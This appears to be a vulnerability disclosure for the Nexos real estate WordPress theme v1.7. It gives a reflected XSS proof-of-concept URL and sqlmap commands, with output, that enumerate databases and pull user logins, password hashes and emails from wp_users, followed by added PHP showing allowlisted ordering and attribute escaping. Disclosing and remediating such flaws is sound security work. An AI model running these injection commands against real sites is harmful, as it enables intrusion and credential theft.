Unauthenticated Reflected XSS and SQL Injection vulnerabilities were discovered in the «Nexos - Real Estate WordPress Theme»; the tested version was v1.7.

- June 17th, 2020 - Confirmed & Escalated to Envato.
- June 19th, 2020 - v1.8 released, fixing the issues.
PoC
### PoC Unauthenticated Reflected XSS:

```
https://example.com/nexos-wp/top-map/?search_order=idlisting DESC&search_location=">
```

### PoC SQL Injection:

```
[!] sqlmap --url="https://example.com/nexos-wp/side-map/?search_order=idlisting DESC" --dbs --random-agent --threads 4
[02:23:33] [INFO] the back-end DBMS is MySQL
[02:23:33] [INFO] fetching database names
[02:23:33] [INFO] fetching number of databases
[02:23:33] [INFO] resumed: 2
available databases [2]:
[*] xx_nexos
[*] information_schema

[!] sqlmap --url="https://example.com/nexos-wp/side-map/?search_order=idlisting DESC" -D xx_nexos -T wp_users -C user_login,user_pass,user_email --random-agent --threads 8
Database: xx_nexos
Table: wp_users
[9 entries]
[REDACTED]
```
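Both PoCs go through request parameters: `search_order` carries a column name and a sort direction, and `search_location` is reflected into the page. The PHP below is an added example of how each input can be handled safely; it is not the theme's code or the vendor's v1.8 fix. The function and constant names are hypothetical, and it assumes that `search_order` feeds an `ORDER BY` clause and that `search_location` is echoed into an HTML attribute.

```php
<?php
declare(strict_types=1);

// Added example; all names are hypothetical, not taken from the Nexos theme.

// Column names and sort directions cannot be bound as prepared-statement
// parameters, so the request value is used only as a key into a fixed map.
// 'idlisting DESC' is the value seen in the PoC; the ASC variant is assumed.
const SEARCH_ORDERS = [
    'idlisting DESC' => ['idlisting', 'DESC'],
    'idlisting ASC'  => ['idlisting', 'ASC'],
];
const DEFAULT_SEARCH_ORDER = 'idlisting DESC';

// Returns an ORDER BY clause built only from allowlisted literals.
// Unknown or missing values fall back to the default ordering.
function order_by_clause(?string $requested): string
{
    [$column, $direction] = SEARCH_ORDERS[$requested ?? '']
        ?? SEARCH_ORDERS[DEFAULT_SEARCH_ORDER];
    return "ORDER BY `{$column}` {$direction}";
}

// Re-renders the search box with the submitted value encoded for an
// attribute context, so quotes and angle brackets stay inside value="...".
function location_field(?string $requested): string
{
    $value = htmlspecialchars($requested ?? '', ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="search_location" value="' . $value . '">';
}

// Constructed sample requests: an expected one, one with extra SQL text and
// markup in the parameters, and one with both parameters missing.
$samples = [
    ['search_order' => 'idlisting DESC', 'search_location' => 'Berlin'],
    ['search_order' => 'idlisting DESC, extra_clause', 'search_location' => '"><b>x</b>'],
    [],
];

foreach ($samples as $query) {
    echo order_by_clause($query['search_order'] ?? null), PHP_EOL;
    echo location_field($query['search_location'] ?? null), PHP_EOL;
}
```

Inside WordPress, `esc_attr()` is the core helper for the attribute case.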